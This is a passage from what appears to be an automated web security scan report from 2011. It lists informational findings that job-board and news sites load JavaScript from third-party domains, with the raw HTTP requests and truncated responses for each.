Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.353. http://www.hospitalitycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129154

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.354. http://www.hototc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hototc.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.hototc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:30:08 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "45f8-4cca7a20-0"
Last-Modified: Fri, 29 Oct 2010 07:39:12 GMT
Content-Type: text/html
Content-Length: 17912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<!-- Google Analytics Code Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

15.355. http://www.hound.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hound.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=125x125\ HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=a827dr0sigiku3i02l6760rfb1; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: country=United+States; expires=Sun, 20-Feb-2011 19:34:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 121008


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>The Largest Online Job Search Engine | Jobs from Employers | Hound.com</ti
...[SNIP]...
<br style="line-height:10px;">
<script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src="http://srvr12.pdcsrvr.com/media/www/empsc/f1.js"></script>
...[SNIP]...
<!-- GOOGLE ANALYTICS START -->    
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

15.356. http://www.hrcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.357. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/01/05/david-koch-tea-party-republicans_n_804997.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/05/david-koch-tea-party-republicans_n_804997.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 291249
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&amp;1295646638&amp;extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&amp;1295646638&amp;extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
<!-- End Quantcast Delivery Tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter.js&amp;1295646638"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&amp;v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

15.358. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 294578
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:27 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&amp;1295646638&amp;extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&amp;1295646638&amp;extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
<!-- End Quantcast Delivery Tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&amp;v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

15.359. http://www.huffingtonpost.com/2011/01/19/craziest-ways-to-pay-tuit_n_811038.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/01/19/craziest-ways-to-pay-tuit_n_811038.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/19/craziest-ways-to-pay-tuit_n_811038.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 325663
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:23 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&amp;1295646638&amp;extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js%2Cslideshow%2Fpollajax.js&amp;1295646638&amp;extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
<!-- End Quantcast Delivery Tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>


<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter.js&amp;1295646638"></script>
...[SNIP]...
<!-- CommentsV3 -->
<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&amp;v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

15.360. http://www.hvaccrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112628

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.361. http://www.informationtechnologycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:43 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133954

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.362. http://www.insurcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127189

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.363. http://www.intellectualpropertycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
